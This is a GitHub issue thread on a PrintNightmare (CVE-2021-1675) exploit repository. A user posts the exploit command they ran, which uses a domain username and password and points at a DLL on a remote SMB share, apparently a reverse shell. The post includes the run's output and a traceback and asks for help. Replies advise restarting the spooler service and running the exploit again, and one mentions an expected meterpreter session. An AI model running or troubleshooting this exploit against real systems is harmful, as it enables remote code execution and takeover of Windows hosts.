cube0x0 / CVE-2021-1675

C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527

SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.) #56

Open wxh0000mm opened 3 years ago

wxh0000mm commented 3 years ago

──(king㉿Kali)-[~/CVE-2021-1675]
└─$ sudo python3 CVE-2021-1675.py genyu.com/wxh:Admin123@192.168.175.133 '\\192.168.175.132\smb\rever.dll'

[*] Connecting to ncacn_np:192.168.175.133[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.175.132\smb\rever.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 568, in writeFile
    return self._SMBConnection.writeFile(treeId, fileId, data, offset)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1650, in writeFile
    written = self.write(treeId, fileId, writeData, writeOffset, len(writeData))
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1358, in write
    if ans.isValidAnswer(STATUS_SUCCESS):
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3structs.py", line 454, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/king/CVE-2021-1675/CVE-2021-1675.py", line 190, in <module>
    main(dce, pDriverPath, options.share)
  File "/home/king/CVE-2021-1675/CVE-2021-1675.py", line 93, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 856, in request
    self.call(request.opnum, request, uuid)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 845, in call
    return self.send(DCERPC_RawCall(function, body.getData(), uuid))
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1298, in send
    self._transport_send(data)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1235, in _transport_send
    self._transport.send(rpc_packet.get_packet(), forceWriteAndx = forceWriteAndx, forceRecv = forceRecv)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 535, in send
    self.__smb_connection.writeFile(self.tid, self.handle, data)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 570, in writeFile
    raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)

PLEASE HELP ME!!!!

TiBag93 commented 3 years ago

I had the same issue a few days ago. You have to make sure that the spooler.exe service is running on your Active Directory. Try turning it on and exploit it again. In my case it worked as expected afterwards.

(I received an error-code in my terminal but the meterpreter session should start properly)

sasdallas commented 8 months ago

@wxh0000mm In my experience it's an error with the spooling service. Try restarting it through taskmgr.